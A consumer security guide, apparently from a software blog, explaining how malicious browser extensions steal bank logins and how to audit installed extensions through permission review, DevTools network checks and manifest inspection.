How to Detect a Malicious Browser Extension Stealing Bank Logins

··12 min read
How to Detect a Malicious Browser Extension Stealing Bank Logins

You install a browser extension that promises to save you money on checkout. Two weeks later, your bank calls about a login from a device in another country. The two events feel unrelated. They almost never are.

Malicious browser extensions are one of the most underrated threats in personal and corporate security. A 2023 study by Stanford and CISPA researchers cataloged more than 280 million installs of policy-violating or outright malicious Chrome extensions across three years. Many of those extensions started life as legitimate tools with thousands of good reviews, then quietly turned hostile after an "update" or an ownership change. The extension in your toolbar today is not guaranteed to be the same code you approved last month.

This guide walks you through malicious browser extension detection from the ground up: how login-stealing extensions actually work, the exact browser tools you use to catch them, a repeatable audit you can run in fifteen minutes, and how to compare detection approaches. By the end you will be able to look at any extension and decide whether it belongs anywhere near your banking session.

Key Takeaways
  • Extensions that request <all_urls> or "Read and change all your data on all websites" can read every form field, including passwords and OTPs.
  • The biggest risk is the silent update: a trusted extension gets sold or hijacked, then ships malicious code to existing users.
  • You can audit any extension in about 15 minutes using built-in browser pages, the network tab, and the extension's manifest.
  • Watch for unexplained outbound requests to unfamiliar domains, especially during login, checkout, and password-reset flows.
  • Use a dedicated browser profile (or separate browser) for banking with zero extensions installed.
  • Layered defense beats any single check. Combine browser hardening, endpoint protection, and site-level protection for accounts you control.

How a Malicious Browser Extension Steals Bank Logins

Browser extensions run inside the same page you do. That is the whole point of them, and also the whole problem. When an extension has permission to read a page, it can read everything on that page, including the value you just typed into a password box before you hit submit.

Here is the typical attack chain, step by step:

  1. Broad permission grant. The extension requests access to all sites. Most users click through the permission dialog without reading it.
  2. Content script injection. The extension injects JavaScript into every page you load. This script can attach listeners to form fields.
  3. Credential capture. When you type into a login form, a keystroke or input event handler records the value. On submit, it grabs the complete username and password pair.
  4. Session and cookie theft. With the right permissions, the extension reads authentication cookies and session tokens, which lets an attacker skip the password entirely.
  5. Exfiltration. The captured data is sent to a remote server, often disguised as an analytics or "telemetry" call to a domain that looks boring on purpose.

The scariest variant does not steal the password at all. It waits until you are logged in, then quietly initiates transactions inside your authenticated session. Since the request comes from your own browser with your own cookies, the bank sees a legitimate user. This is why two-factor authentication alone will not save you: the extension is already inside the fence.

Why "trusted" extensions turn hostile

Most login-stealing extensions were not malicious on day one. Three patterns dominate:

  • Acquisition. A developer with a popular free extension sells it. The buyer pushes a malicious update to the existing install base.
  • Compromised developer account. Attackers phish the developer, then publish an update through the legitimate account.
  • Dependency poisoning. The extension loads remote code or a third-party library that later gets compromised.

This is closely related to the supply-chain risks we cover in how to lock down AI agent browsers before extensions hijack them, where automated browsing agents multiply the blast radius of a single bad extension.

Warning Signs of a Malicious Browser Extension

Before you open a single developer tool, a fast behavioral check catches many bad actors. Any one of these is a yellow flag. Two or more is a red flag.

  • New tabs, redirects, or injected ads that started appearing after you installed something.
  • Your homepage or default search engine changed without your action.
  • The extension asks for far more access than its job requires. A unit converter does not need to read all your websites.
  • Sluggish page loads on sites that used to be fast, because a content script runs on every page.
  • The extension name or icon changed after an update, a common sign of ownership transfer.
  • Reviews mention "it was great until the last update," which is the single most reliable public warning.
  • Login prompts that look slightly off on banking sites, since some extensions overlay fake forms.

The permission review is the highest-value five seconds you can spend. In Chrome and Edge, go to chrome://extensions, click Details, and read the "Permissions" and "Site access" sections. "Read and change all your data on all websites" is the phrase that should make you stop and ask why.

A 15-Minute Malicious Browser Extension Detection Audit

This is the repeatable process I run on any machine that touches money. It uses only built-in browser features, no paid scanner required.

Step 1: Inventory every installed extension (3 minutes)

  1. Chrome/Edge/Brave: open chrome://extensions. Firefox: about:addons.
  2. List every extension. Be ruthless about anything you do not actively use.
  3. For each one, note the developer, the last update date, and whether you remember installing it.

Say you have 23 extensions installed. In practice, most people actively use 4 or 5. That means 18 extensions are sitting there with page-read permissions for no reason. Removing unused extensions is the fastest risk reduction available to you.

Step 2: Review permissions against purpose (3 minutes)

Open each extension's details and compare what it can do against what it should need. A screenshot tool needs the active tab. A password manager legitimately needs broad access. A "coupon finder" that reads all sites and runs on startup deserves scrutiny.

Step 3: Watch the network during a login (5 minutes)

This is the step that separates guesswork from evidence.

  1. Open a non-sensitive test login page (create a throwaway account somewhere, never use your real bank for the test).
  2. Press F12 to open DevTools and switch to the Network tab.
  3. Check "Preserve log" so requests are not cleared on navigation.
  4. Type a fake password and submit. Watch every outbound request.
  5. Any request to a domain you do not recognize, fired at the moment of submit, is a serious red flag. Legitimate logins talk to the site's own domain and its known auth provider.

To attribute traffic specifically to extensions, open a fresh profile with no extensions and repeat the same login. Compare the request lists. Any domain that appears only in your normal profile is coming from an extension or other injected code.

Step 4: Inspect the extension's files (2 minutes)

Extensions are just folders of code. On Chrome, extensions live under your profile directory in an Extensions folder, each named by its ID. Open the manifest.json and look at:

  • permissions and host_permissions: what it can touch.
  • content_scripts: which pages it injects into. "matches": ["<all_urls>"] means everywhere.
  • background service worker: what runs even when you are not clicking the extension.

If you find references to remote script loading or obfuscated, minified code that does not match the extension's simple purpose, remove it. If you work with symbolic links to keep extension folders organized for analysis across drives, a tool like Windows Symlink Creator Pro makes that housekeeping painless on Windows.

Built-in Tools vs Dedicated Scanners: What Actually Catches It

People often ask whether they need a paid extension scanner. The honest answer is that layered detection works better than any single product. Here is how the main approaches compare.

Method Catches silent updates? Detects exfiltration? Skill required Cost
Manual permission review Partial No Low Free
DevTools network analysis Yes Yes Medium Free
Endpoint antivirus / EDR Sometimes Sometimes Low Paid
Enterprise extension allowlist Yes Indirect High Paid
Dedicated browser profile (no extensions) Yes (avoids entirely) N/A Low Free

The clear winner for banking is the last row: a clean, extension-free profile used only for financial sites. It is free, requires no expertise, and sidesteps the entire threat class. Everything else is for the sites you cannot fully isolate.

A Before-and-After Scenario Worth Copying

Let me make this concrete with a realistic setup and how a five-minute change reduces exposure.

Before. Priya runs a small e-commerce shop. She uses one Chrome profile for everything: her business bank, her payment processor, her supplier accounts, plus 19 extensions accumulated over three years. Six of those extensions can read and change data on all sites. Her attack surface for a single compromised extension covers all 8 of her sensitive logins.

After. She creates two profiles. Profile A has zero extensions and is used only for banking and payments. Profile B keeps her productivity extensions for everyday browsing. Now, even if one of her 19 extensions turns malicious, it never sees a banking session. Her exposed sensitive logins drop from 8 to 0. Time invested: about 6 minutes.

Cover image: Wikipedia Reading Lists - Chrome screenshot 1 by RHo (WMF), licensed under BY-SA 4.0 via Openverse.

Recent Posts

View all →

Most Popular Software

View all →

Browse by Platform

View all →